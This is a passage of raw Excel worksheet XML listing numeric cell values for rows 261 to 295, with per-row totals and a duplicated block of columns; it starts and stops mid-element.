        <v>154</v>
      </c>
      <c r="K261" s="7">
        <v>642</v>
      </c>
      <c r="L261" s="8">
        <v>25</v>
      </c>
      <c r="M261" s="8">
        <v>1</v>
      </c>
      <c r="N261" s="8">
        <v>30</v>
      </c>
      <c r="O261" s="8">
        <v>93</v>
      </c>
      <c r="P261" s="8">
        <v>3</v>
      </c>
      <c r="Q261" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="262" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A262" s="7">
        <v>645</v>
      </c>
      <c r="B262" s="8">
        <v>16</v>
      </c>
      <c r="C262" s="8">
        <v>1</v>
      </c>
      <c r="D262" s="8">
        <v>0</v>
      </c>
      <c r="E262" s="8">
        <v>0</v>
      </c>
      <c r="F262" s="8">
        <v>6</v>
      </c>
      <c r="G262" s="8">
        <v>0</v>
      </c>
      <c r="H262" s="8">
        <v>23</v>
      </c>
      <c r="K262" s="7">
        <v>645</v>
      </c>
      <c r="L262" s="8">
        <v>16</v>
      </c>
      <c r="M262" s="8">
        <v>1</v>
      </c>
      <c r="N262" s="8">
        <v>0</v>
      </c>
      <c r="O262" s="8">
        <v>0</v>
      </c>
      <c r="P262" s="8">
        <v>6</v>
      </c>
      <c r="Q262" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="263" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A263" s="7">
        <v>650</v>
      </c>
      <c r="B263" s="8">
        <v>24</v>
      </c>
      <c r="C263" s="8">
        <v>2</v>
      </c>
      <c r="D263" s="8">
        <v>0</v>
      </c>
      <c r="E263" s="8">
        <v>0</v>
      </c>
      <c r="F263" s="8">
        <v>6</v>
      </c>
      <c r="G263" s="8">
        <v>2</v>
      </c>
      <c r="H263" s="8">
        <v>34</v>
      </c>
      <c r="K263" s="7">
        <v>650</v>
      </c>
      <c r="L263" s="8">
        <v>24</v>
      </c>
      <c r="M263" s="8">
        <v>2</v>
      </c>
      <c r="N263" s="8">
        <v>0</v>
      </c>
      <c r="O263" s="8">
        <v>0</v>
      </c>
      <c r="P263" s="8">
        <v>6</v>
      </c>
      <c r="Q263" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="264" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A264" s="7">
        <v>655</v>
      </c>
      <c r="B264" s="8">
        <v>350</v>
      </c>
      <c r="C264" s="8">
        <v>0</v>
      </c>
      <c r="D264" s="8">
        <v>10</v>
      </c>
      <c r="E264" s="8">
        <v>44</v>
      </c>
      <c r="F264" s="8">
        <v>12</v>
      </c>
      <c r="G264" s="8">
        <v>9</v>
      </c>
      <c r="H264" s="8">
        <v>425</v>
      </c>
      <c r="K264" s="7">
        <v>655</v>
      </c>
      <c r="L264" s="8">
        <v>350</v>
      </c>
      <c r="M264" s="8">
        <v>0</v>
      </c>
      <c r="N264" s="8">
        <v>10</v>
      </c>
      <c r="O264" s="8">
        <v>44</v>
      </c>
      <c r="P264" s="8">
        <v>12</v>
      </c>
      <c r="Q264" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="265" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A265" s="7">
        <v>656</v>
      </c>
      <c r="B265" s="8">
        <v>30</v>
      </c>
      <c r="C265" s="8">
        <v>30</v>
      </c>
      <c r="D265" s="8">
        <v>4</v>
      </c>
      <c r="E265" s="8">
        <v>4</v>
      </c>
      <c r="F265" s="8">
        <v>18</v>
      </c>
      <c r="G265" s="8">
        <v>10</v>
      </c>
      <c r="H265" s="8">
        <v>96</v>
      </c>
      <c r="K265" s="7">
        <v>656</v>
      </c>
      <c r="L265" s="8">
        <v>30</v>
      </c>
      <c r="M265" s="8">
        <v>30</v>
      </c>
      <c r="N265" s="8">
        <v>4</v>
      </c>
      <c r="O265" s="8">
        <v>4</v>
      </c>
      <c r="P265" s="8">
        <v>18</v>
      </c>
      <c r="Q265" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="266" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A266" s="7">
        <v>658</v>
      </c>
      <c r="B266" s="8">
        <v>0</v>
      </c>
      <c r="C266" s="8">
        <v>0</v>
      </c>
      <c r="D266" s="8">
        <v>20</v>
      </c>
      <c r="E266" s="8">
        <v>11</v>
      </c>
      <c r="F266" s="8">
        <v>8</v>
      </c>
      <c r="G266" s="8">
        <v>14</v>
      </c>
      <c r="H266" s="8">
        <v>53</v>
      </c>
      <c r="K266" s="7">
        <v>658</v>
      </c>
      <c r="L266" s="8">
        <v>0</v>
      </c>
      <c r="M266" s="8">
        <v>0</v>
      </c>
      <c r="N266" s="8">
        <v>20</v>
      </c>
      <c r="O266" s="8">
        <v>11</v>
      </c>
      <c r="P266" s="8">
        <v>8</v>
      </c>
      <c r="Q266" s="8">
        <v>14</v>
      </c>
    </row>
    <row r="267" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A267" s="7">
        <v>660</v>
      </c>
      <c r="B267" s="8">
        <v>0</v>
      </c>
      <c r="C267" s="8">
        <v>0</v>
      </c>
      <c r="D267" s="8">
        <v>20</v>
      </c>
      <c r="E267" s="8">
        <v>300</v>
      </c>
      <c r="F267" s="8">
        <v>58</v>
      </c>
      <c r="G267" s="8">
        <v>137</v>
      </c>
      <c r="H267" s="8">
        <v>515</v>
      </c>
      <c r="K267" s="7">
        <v>660</v>
      </c>
      <c r="L267" s="8">
        <v>0</v>
      </c>
      <c r="M267" s="8">
        <v>0</v>
      </c>
      <c r="N267" s="8">
        <v>20</v>
      </c>
      <c r="O267" s="8">
        <v>300</v>
      </c>
      <c r="P267" s="8">
        <v>58</v>
      </c>
      <c r="Q267" s="8">
        <v>137</v>
      </c>
    </row>
    <row r="268" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A268" s="7">
        <v>661</v>
      </c>
      <c r="B268" s="8">
        <v>0</v>
      </c>
      <c r="C268" s="8">
        <v>0</v>
      </c>
      <c r="D268" s="8">
        <v>6</v>
      </c>
      <c r="E268" s="8">
        <v>1</v>
      </c>
      <c r="F268" s="8">
        <v>2</v>
      </c>
      <c r="G268" s="8">
        <v>0</v>
      </c>
      <c r="H268" s="8">
        <v>9</v>
      </c>
      <c r="K268" s="7">
        <v>661</v>
      </c>
      <c r="L268" s="8">
        <v>0</v>
      </c>
      <c r="M268" s="8">
        <v>0</v>
      </c>
      <c r="N268" s="8">
        <v>6</v>
      </c>
      <c r="O268" s="8">
        <v>1</v>
      </c>
      <c r="P268" s="8">
        <v>2</v>
      </c>
      <c r="Q268" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="269" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A269" s="7">
        <v>662</v>
      </c>
      <c r="B269" s="8">
        <v>10</v>
      </c>
      <c r="C269" s="8">
        <v>0</v>
      </c>
      <c r="D269" s="8">
        <v>2</v>
      </c>
      <c r="E269" s="8">
        <v>0</v>
      </c>
      <c r="F269" s="8">
        <v>2</v>
      </c>
      <c r="G269" s="8">
        <v>1</v>
      </c>
      <c r="H269" s="8">
        <v>15</v>
      </c>
      <c r="K269" s="7">
        <v>662</v>
      </c>
      <c r="L269" s="8">
        <v>10</v>
      </c>
      <c r="M269" s="8">
        <v>0</v>
      </c>
      <c r="N269" s="8">
        <v>2</v>
      </c>
      <c r="O269" s="8">
        <v>0</v>
      </c>
      <c r="P269" s="8">
        <v>2</v>
      </c>
      <c r="Q269" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="270" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A270" s="7">
        <v>664</v>
      </c>
      <c r="B270" s="8">
        <v>6</v>
      </c>
      <c r="C270" s="8">
        <v>0</v>
      </c>
      <c r="D270" s="8">
        <v>0</v>
      </c>
      <c r="E270" s="8">
        <v>0</v>
      </c>
      <c r="F270" s="8">
        <v>32</v>
      </c>
      <c r="G270" s="8">
        <v>0</v>
      </c>
      <c r="H270" s="8">
        <v>38</v>
      </c>
      <c r="K270" s="7">
        <v>664</v>
      </c>
      <c r="L270" s="8">
        <v>6</v>
      </c>
      <c r="M270" s="8">
        <v>0</v>
      </c>
      <c r="N270" s="8">
        <v>0</v>
      </c>
      <c r="O270" s="8">
        <v>0</v>
      </c>
      <c r="P270" s="8">
        <v>32</v>
      </c>
      <c r="Q270" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="271" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A271" s="7">
        <v>667</v>
      </c>
      <c r="B271" s="8">
        <v>26</v>
      </c>
      <c r="C271" s="8">
        <v>1</v>
      </c>
      <c r="D271" s="8">
        <v>8</v>
      </c>
      <c r="E271" s="8">
        <v>2</v>
      </c>
      <c r="F271" s="8">
        <v>21</v>
      </c>
      <c r="G271" s="8">
        <v>7</v>
      </c>
      <c r="H271" s="8">
        <v>65</v>
      </c>
      <c r="K271" s="7">
        <v>667</v>
      </c>
      <c r="L271" s="8">
        <v>26</v>
      </c>
      <c r="M271" s="8">
        <v>1</v>
      </c>
      <c r="N271" s="8">
        <v>8</v>
      </c>
      <c r="O271" s="8">
        <v>2</v>
      </c>
      <c r="P271" s="8">
        <v>21</v>
      </c>
      <c r="Q271" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="272" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A272" s="7">
        <v>671</v>
      </c>
      <c r="B272" s="8">
        <v>25</v>
      </c>
      <c r="C272" s="8">
        <v>1</v>
      </c>
      <c r="D272" s="8">
        <v>23</v>
      </c>
      <c r="E272" s="8">
        <v>46</v>
      </c>
      <c r="F272" s="8">
        <v>10</v>
      </c>
      <c r="G272" s="8">
        <v>9</v>
      </c>
      <c r="H272" s="8">
        <v>114</v>
      </c>
      <c r="K272" s="7">
        <v>671</v>
      </c>
      <c r="L272" s="8">
        <v>25</v>
      </c>
      <c r="M272" s="8">
        <v>1</v>
      </c>
      <c r="N272" s="8">
        <v>23</v>
      </c>
      <c r="O272" s="8">
        <v>46</v>
      </c>
      <c r="P272" s="8">
        <v>10</v>
      </c>
      <c r="Q272" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="273" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A273" s="7">
        <v>674</v>
      </c>
      <c r="B273" s="8">
        <v>26</v>
      </c>
      <c r="C273" s="8">
        <v>1</v>
      </c>
      <c r="D273" s="8">
        <v>0</v>
      </c>
      <c r="E273" s="8">
        <v>0</v>
      </c>
      <c r="F273" s="8">
        <v>39</v>
      </c>
      <c r="G273" s="8">
        <v>91</v>
      </c>
      <c r="H273" s="8">
        <v>157</v>
      </c>
      <c r="K273" s="7">
        <v>674</v>
      </c>
      <c r="L273" s="8">
        <v>26</v>
      </c>
      <c r="M273" s="8">
        <v>1</v>
      </c>
      <c r="N273" s="8">
        <v>0</v>
      </c>
      <c r="O273" s="8">
        <v>0</v>
      </c>
      <c r="P273" s="8">
        <v>39</v>
      </c>
      <c r="Q273" s="8">
        <v>91</v>
      </c>
    </row>
    <row r="274" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A274" s="7">
        <v>678</v>
      </c>
      <c r="B274" s="8">
        <v>45</v>
      </c>
      <c r="C274" s="8">
        <v>0</v>
      </c>
      <c r="D274" s="8">
        <v>12</v>
      </c>
      <c r="E274" s="8">
        <v>3</v>
      </c>
      <c r="F274" s="8">
        <v>38</v>
      </c>
      <c r="G274" s="8">
        <v>12</v>
      </c>
      <c r="H274" s="8">
        <v>110</v>
      </c>
      <c r="K274" s="7">
        <v>678</v>
      </c>
      <c r="L274" s="8">
        <v>45</v>
      </c>
      <c r="M274" s="8">
        <v>0</v>
      </c>
      <c r="N274" s="8">
        <v>12</v>
      </c>
      <c r="O274" s="8">
        <v>3</v>
      </c>
      <c r="P274" s="8">
        <v>38</v>
      </c>
      <c r="Q274" s="8">
        <v>12</v>
      </c>
    </row>
    <row r="275" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A275" s="7">
        <v>679</v>
      </c>
      <c r="B275" s="8">
        <v>26</v>
      </c>
      <c r="C275" s="8">
        <v>1</v>
      </c>
      <c r="D275" s="8">
        <v>0</v>
      </c>
      <c r="E275" s="8">
        <v>0</v>
      </c>
      <c r="F275" s="8">
        <v>6</v>
      </c>
      <c r="G275" s="8">
        <v>5</v>
      </c>
      <c r="H275" s="8">
        <v>38</v>
      </c>
      <c r="K275" s="7">
        <v>679</v>
      </c>
      <c r="L275" s="8">
        <v>26</v>
      </c>
      <c r="M275" s="8">
        <v>1</v>
      </c>
      <c r="N275" s="8">
        <v>0</v>
      </c>
      <c r="O275" s="8">
        <v>0</v>
      </c>
      <c r="P275" s="8">
        <v>6</v>
      </c>
      <c r="Q275" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="276" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A276" s="7">
        <v>680</v>
      </c>
      <c r="B276" s="8">
        <v>0</v>
      </c>
      <c r="C276" s="8">
        <v>0</v>
      </c>
      <c r="D276" s="8">
        <v>0</v>
      </c>
      <c r="E276" s="8">
        <v>0</v>
      </c>
      <c r="F276" s="8">
        <v>39</v>
      </c>
      <c r="G276" s="8">
        <v>8</v>
      </c>
      <c r="H276" s="8">
        <v>47</v>
      </c>
      <c r="K276" s="7">
        <v>680</v>
      </c>
      <c r="L276" s="8">
        <v>0</v>
      </c>
      <c r="M276" s="8">
        <v>0</v>
      </c>
      <c r="N276" s="8">
        <v>0</v>
      </c>
      <c r="O276" s="8">
        <v>0</v>
      </c>
      <c r="P276" s="8">
        <v>39</v>
      </c>
      <c r="Q276" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="277" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A277" s="7">
        <v>681</v>
      </c>
      <c r="B277" s="8">
        <v>22</v>
      </c>
      <c r="C277" s="8">
        <v>2</v>
      </c>
      <c r="D277" s="8">
        <v>0</v>
      </c>
      <c r="E277" s="8">
        <v>0</v>
      </c>
      <c r="F277" s="8">
        <v>4</v>
      </c>
      <c r="G277" s="8">
        <v>2</v>
      </c>
      <c r="H277" s="8">
        <v>30</v>
      </c>
      <c r="K277" s="7">
        <v>681</v>
      </c>
      <c r="L277" s="8">
        <v>22</v>
      </c>
      <c r="M277" s="8">
        <v>2</v>
      </c>
      <c r="N277" s="8">
        <v>0</v>
      </c>
      <c r="O277" s="8">
        <v>0</v>
      </c>
      <c r="P277" s="8">
        <v>4</v>
      </c>
      <c r="Q277" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="278" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A278" s="7">
        <v>683</v>
      </c>
      <c r="B278" s="8">
        <v>30</v>
      </c>
      <c r="C278" s="8">
        <v>2</v>
      </c>
      <c r="D278" s="8">
        <v>10</v>
      </c>
      <c r="E278" s="8">
        <v>3</v>
      </c>
      <c r="F278" s="8">
        <v>12</v>
      </c>
      <c r="G278" s="8">
        <v>3</v>
      </c>
      <c r="H278" s="8">
        <v>60</v>
      </c>
      <c r="K278" s="7">
        <v>683</v>
      </c>
      <c r="L278" s="8">
        <v>30</v>
      </c>
      <c r="M278" s="8">
        <v>2</v>
      </c>
      <c r="N278" s="8">
        <v>10</v>
      </c>
      <c r="O278" s="8">
        <v>3</v>
      </c>
      <c r="P278" s="8">
        <v>12</v>
      </c>
      <c r="Q278" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="279" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A279" s="7">
        <v>684</v>
      </c>
      <c r="B279" s="8">
        <v>14</v>
      </c>
      <c r="C279" s="8">
        <v>0</v>
      </c>
      <c r="D279" s="8">
        <v>7</v>
      </c>
      <c r="E279" s="8">
        <v>0</v>
      </c>
      <c r="F279" s="8">
        <v>2</v>
      </c>
      <c r="G279" s="8">
        <v>4</v>
      </c>
      <c r="H279" s="8">
        <v>27</v>
      </c>
      <c r="K279" s="7">
        <v>684</v>
      </c>
      <c r="L279" s="8">
        <v>14</v>
      </c>
      <c r="M279" s="8">
        <v>0</v>
      </c>
      <c r="N279" s="8">
        <v>7</v>
      </c>
      <c r="O279" s="8">
        <v>0</v>
      </c>
      <c r="P279" s="8">
        <v>2</v>
      </c>
      <c r="Q279" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="280" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A280" s="7">
        <v>686</v>
      </c>
      <c r="B280" s="8">
        <v>0</v>
      </c>
      <c r="C280" s="8">
        <v>0</v>
      </c>
      <c r="D280" s="8">
        <v>0</v>
      </c>
      <c r="E280" s="8">
        <v>0</v>
      </c>
      <c r="F280" s="8">
        <v>7</v>
      </c>
      <c r="G280" s="8">
        <v>1</v>
      </c>
      <c r="H280" s="8">
        <v>8</v>
      </c>
      <c r="K280" s="7">
        <v>686</v>
      </c>
      <c r="L280" s="8">
        <v>0</v>
      </c>
      <c r="M280" s="8">
        <v>0</v>
      </c>
      <c r="N280" s="8">
        <v>0</v>
      </c>
      <c r="O280" s="8">
        <v>0</v>
      </c>
      <c r="P280" s="8">
        <v>7</v>
      </c>
      <c r="Q280" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="281" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A281" s="7">
        <v>689</v>
      </c>
      <c r="B281" s="8">
        <v>6</v>
      </c>
      <c r="C281" s="8">
        <v>1</v>
      </c>
      <c r="D281" s="8">
        <v>0</v>
      </c>
      <c r="E281" s="8">
        <v>0</v>
      </c>
      <c r="F281" s="8">
        <v>3</v>
      </c>
      <c r="G281" s="8">
        <v>1</v>
      </c>
      <c r="H281" s="8">
        <v>11</v>
      </c>
      <c r="K281" s="7">
        <v>689</v>
      </c>
      <c r="L281" s="8">
        <v>6</v>
      </c>
      <c r="M281" s="8">
        <v>1</v>
      </c>
      <c r="N281" s="8">
        <v>0</v>
      </c>
      <c r="O281" s="8">
        <v>0</v>
      </c>
      <c r="P281" s="8">
        <v>3</v>
      </c>
      <c r="Q281" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="282" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A282" s="7">
        <v>690</v>
      </c>
      <c r="B282" s="8">
        <v>24</v>
      </c>
      <c r="C282" s="8">
        <v>1</v>
      </c>
      <c r="D282" s="8">
        <v>7</v>
      </c>
      <c r="E282" s="8">
        <v>0</v>
      </c>
      <c r="F282" s="8">
        <v>0</v>
      </c>
      <c r="G282" s="8">
        <v>1</v>
      </c>
      <c r="H282" s="8">
        <v>33</v>
      </c>
      <c r="K282" s="7">
        <v>690</v>
      </c>
      <c r="L282" s="8">
        <v>24</v>
      </c>
      <c r="M282" s="8">
        <v>1</v>
      </c>
      <c r="N282" s="8">
        <v>7</v>
      </c>
      <c r="O282" s="8">
        <v>0</v>
      </c>
      <c r="P282" s="8">
        <v>0</v>
      </c>
      <c r="Q282" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="283" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A283" s="7">
        <v>691</v>
      </c>
      <c r="B283" s="8">
        <v>26</v>
      </c>
      <c r="C283" s="8">
        <v>1</v>
      </c>
      <c r="D283" s="8">
        <v>0</v>
      </c>
      <c r="E283" s="8">
        <v>0</v>
      </c>
      <c r="F283" s="8">
        <v>6</v>
      </c>
      <c r="G283" s="8">
        <v>2</v>
      </c>
      <c r="H283" s="8">
        <v>35</v>
      </c>
      <c r="K283" s="7">
        <v>691</v>
      </c>
      <c r="L283" s="8">
        <v>26</v>
      </c>
      <c r="M283" s="8">
        <v>1</v>
      </c>
      <c r="N283" s="8">
        <v>0</v>
      </c>
      <c r="O283" s="8">
        <v>0</v>
      </c>
      <c r="P283" s="8">
        <v>6</v>
      </c>
      <c r="Q283" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="284" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A284" s="7">
        <v>701</v>
      </c>
      <c r="B284" s="8">
        <v>22</v>
      </c>
      <c r="C284" s="8">
        <v>1</v>
      </c>
      <c r="D284" s="8">
        <v>0</v>
      </c>
      <c r="E284" s="8">
        <v>0</v>
      </c>
      <c r="F284" s="8">
        <v>2</v>
      </c>
      <c r="G284" s="8">
        <v>4</v>
      </c>
      <c r="H284" s="8">
        <v>29</v>
      </c>
      <c r="K284" s="7">
        <v>701</v>
      </c>
      <c r="L284" s="8">
        <v>22</v>
      </c>
      <c r="M284" s="8">
        <v>1</v>
      </c>
      <c r="N284" s="8">
        <v>0</v>
      </c>
      <c r="O284" s="8">
        <v>0</v>
      </c>
      <c r="P284" s="8">
        <v>2</v>
      </c>
      <c r="Q284" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="285" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A285" s="7">
        <v>704</v>
      </c>
      <c r="B285" s="8">
        <v>26</v>
      </c>
      <c r="C285" s="8">
        <v>0</v>
      </c>
      <c r="D285" s="8">
        <v>0</v>
      </c>
      <c r="E285" s="8">
        <v>0</v>
      </c>
      <c r="F285" s="8">
        <v>5</v>
      </c>
      <c r="G285" s="8">
        <v>2</v>
      </c>
      <c r="H285" s="8">
        <v>33</v>
      </c>
      <c r="K285" s="7">
        <v>704</v>
      </c>
      <c r="L285" s="8">
        <v>26</v>
      </c>
      <c r="M285" s="8">
        <v>0</v>
      </c>
      <c r="N285" s="8">
        <v>0</v>
      </c>
      <c r="O285" s="8">
        <v>0</v>
      </c>
      <c r="P285" s="8">
        <v>5</v>
      </c>
      <c r="Q285" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="286" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A286" s="7">
        <v>708</v>
      </c>
      <c r="B286" s="8">
        <v>0</v>
      </c>
      <c r="C286" s="8">
        <v>0</v>
      </c>
      <c r="D286" s="8">
        <v>0</v>
      </c>
      <c r="E286" s="8">
        <v>0</v>
      </c>
      <c r="F286" s="8">
        <v>4</v>
      </c>
      <c r="G286" s="8">
        <v>6</v>
      </c>
      <c r="H286" s="8">
        <v>10</v>
      </c>
      <c r="K286" s="7">
        <v>708</v>
      </c>
      <c r="L286" s="8">
        <v>0</v>
      </c>
      <c r="M286" s="8">
        <v>0</v>
      </c>
      <c r="N286" s="8">
        <v>0</v>
      </c>
      <c r="O286" s="8">
        <v>0</v>
      </c>
      <c r="P286" s="8">
        <v>4</v>
      </c>
      <c r="Q286" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="287" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A287" s="7">
        <v>709</v>
      </c>
      <c r="B287" s="8">
        <v>26</v>
      </c>
      <c r="C287" s="8">
        <v>1</v>
      </c>
      <c r="D287" s="8">
        <v>0</v>
      </c>
      <c r="E287" s="8">
        <v>0</v>
      </c>
      <c r="F287" s="8">
        <v>14</v>
      </c>
      <c r="G287" s="8">
        <v>16</v>
      </c>
      <c r="H287" s="8">
        <v>57</v>
      </c>
      <c r="K287" s="7">
        <v>709</v>
      </c>
      <c r="L287" s="8">
        <v>26</v>
      </c>
      <c r="M287" s="8">
        <v>1</v>
      </c>
      <c r="N287" s="8">
        <v>0</v>
      </c>
      <c r="O287" s="8">
        <v>0</v>
      </c>
      <c r="P287" s="8">
        <v>14</v>
      </c>
      <c r="Q287" s="8">
        <v>16</v>
      </c>
    </row>
    <row r="288" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A288" s="7">
        <v>710</v>
      </c>
      <c r="B288" s="8">
        <v>48</v>
      </c>
      <c r="C288" s="8">
        <v>1</v>
      </c>
      <c r="D288" s="8">
        <v>0</v>
      </c>
      <c r="E288" s="8">
        <v>0</v>
      </c>
      <c r="F288" s="8">
        <v>2</v>
      </c>
      <c r="G288" s="8">
        <v>2</v>
      </c>
      <c r="H288" s="8">
        <v>53</v>
      </c>
      <c r="K288" s="7">
        <v>710</v>
      </c>
      <c r="L288" s="8">
        <v>48</v>
      </c>
      <c r="M288" s="8">
        <v>1</v>
      </c>
      <c r="N288" s="8">
        <v>0</v>
      </c>
      <c r="O288" s="8">
        <v>0</v>
      </c>
      <c r="P288" s="8">
        <v>2</v>
      </c>
      <c r="Q288" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="289" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A289" s="7">
        <v>711</v>
      </c>
      <c r="B289" s="8">
        <v>15</v>
      </c>
      <c r="C289" s="8">
        <v>1</v>
      </c>
      <c r="D289" s="8">
        <v>1</v>
      </c>
      <c r="E289" s="8">
        <v>10</v>
      </c>
      <c r="F289" s="8">
        <v>0</v>
      </c>
      <c r="G289" s="8">
        <v>2</v>
      </c>
      <c r="H289" s="8">
        <v>29</v>
      </c>
      <c r="K289" s="7">
        <v>711</v>
      </c>
      <c r="L289" s="8">
        <v>15</v>
      </c>
      <c r="M289" s="8">
        <v>1</v>
      </c>
      <c r="N289" s="8">
        <v>1</v>
      </c>
      <c r="O289" s="8">
        <v>10</v>
      </c>
      <c r="P289" s="8">
        <v>0</v>
      </c>
      <c r="Q289" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="290" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A290" s="7">
        <v>713</v>
      </c>
      <c r="B290" s="8">
        <v>25</v>
      </c>
      <c r="C290" s="8">
        <v>1</v>
      </c>
      <c r="D290" s="8">
        <v>0</v>
      </c>
      <c r="E290" s="8">
        <v>10</v>
      </c>
      <c r="F290" s="8">
        <v>1</v>
      </c>
      <c r="G290" s="8">
        <v>0</v>
      </c>
      <c r="H290" s="8">
        <v>37</v>
      </c>
      <c r="K290" s="7">
        <v>713</v>
      </c>
      <c r="L290" s="8">
        <v>25</v>
      </c>
      <c r="M290" s="8">
        <v>1</v>
      </c>
      <c r="N290" s="8">
        <v>0</v>
      </c>
      <c r="O290" s="8">
        <v>10</v>
      </c>
      <c r="P290" s="8">
        <v>1</v>
      </c>
      <c r="Q290" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="291" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A291" s="7">
        <v>715</v>
      </c>
      <c r="B291" s="8">
        <v>24</v>
      </c>
      <c r="C291" s="8">
        <v>1</v>
      </c>
      <c r="D291" s="8">
        <v>1</v>
      </c>
      <c r="E291" s="8">
        <v>1</v>
      </c>
      <c r="F291" s="8">
        <v>3</v>
      </c>
      <c r="G291" s="8">
        <v>3</v>
      </c>
      <c r="H291" s="8">
        <v>33</v>
      </c>
      <c r="K291" s="7">
        <v>715</v>
      </c>
      <c r="L291" s="8">
        <v>24</v>
      </c>
      <c r="M291" s="8">
        <v>1</v>
      </c>
      <c r="N291" s="8">
        <v>1</v>
      </c>
      <c r="O291" s="8">
        <v>1</v>
      </c>
      <c r="P291" s="8">
        <v>3</v>
      </c>
      <c r="Q291" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="292" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A292" s="7">
        <v>716</v>
      </c>
      <c r="B292" s="8">
        <v>26</v>
      </c>
      <c r="C292" s="8">
        <v>1</v>
      </c>
      <c r="D292" s="8">
        <v>14</v>
      </c>
      <c r="E292" s="8">
        <v>7</v>
      </c>
      <c r="F292" s="8">
        <v>19</v>
      </c>
      <c r="G292" s="8">
        <v>15</v>
      </c>
      <c r="H292" s="8">
        <v>82</v>
      </c>
      <c r="K292" s="7">
        <v>716</v>
      </c>
      <c r="L292" s="8">
        <v>26</v>
      </c>
      <c r="M292" s="8">
        <v>1</v>
      </c>
      <c r="N292" s="8">
        <v>14</v>
      </c>
      <c r="O292" s="8">
        <v>7</v>
      </c>
      <c r="P292" s="8">
        <v>19</v>
      </c>
      <c r="Q292" s="8">
        <v>15</v>
      </c>
    </row>
    <row r="293" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A293" s="7">
        <v>718</v>
      </c>
      <c r="B293" s="8">
        <v>30</v>
      </c>
      <c r="C293" s="8">
        <v>0</v>
      </c>
      <c r="D293" s="8">
        <v>20</v>
      </c>
      <c r="E293" s="8">
        <v>30</v>
      </c>
      <c r="F293" s="8">
        <v>15</v>
      </c>
      <c r="G293" s="8">
        <v>23</v>
      </c>
      <c r="H293" s="8">
        <v>118</v>
      </c>
      <c r="K293" s="7">
        <v>718</v>
      </c>
      <c r="L293" s="8">
        <v>30</v>
      </c>
      <c r="M293" s="8">
        <v>0</v>
      </c>
      <c r="N293" s="8">
        <v>20</v>
      </c>
      <c r="O293" s="8">
        <v>30</v>
      </c>
      <c r="P293" s="8">
        <v>15</v>
      </c>
      <c r="Q293" s="8">
        <v>23</v>
      </c>
    </row>
    <row r="294" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A294" s="7">
        <v>721</v>
      </c>
      <c r="B294" s="8">
        <v>25</v>
      </c>
      <c r="C294" s="8">
        <v>1</v>
      </c>
      <c r="D294" s="8">
        <v>578</v>
      </c>
      <c r="E294" s="8">
        <v>1250</v>
      </c>
      <c r="F294" s="8">
        <v>103</v>
      </c>
      <c r="G294" s="8">
        <v>20</v>
      </c>
      <c r="H294" s="8">
        <v>1977</v>
      </c>
      <c r="K294" s="7">
        <v>721</v>
      </c>
      <c r="L294" s="8">
        <v>25</v>
      </c>
      <c r="M294" s="8">
        <v>1</v>
      </c>
      <c r="N294" s="8">
        <v>578</v>
      </c>
      <c r="O294" s="8">
        <v>1250</v>
      </c>
      <c r="P294" s="8">
        <v>103</v>
      </c>
      <c r="Q294" s="8">
        <v>20</v>
      </c>
    </row>
    <row r="295" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A295" s="7">
        <v>722</v>
      </c>
      <c r="B295" s="8">
        <v>25</v>
      </c>
      <c r="C295" s="8">
        <v>1</v>
      </c>
      <c r="D295" s="8">
        <v>52</v>
      </c>
      <c r="E295" s="8">
        <v>220</v>
      </c>
      <c r="F295" s="8">
        <v>22</v>
      </c>
      <c r="G295" s="8">
        <v>5</v>
      </c>
      <c r="H295" s="8">
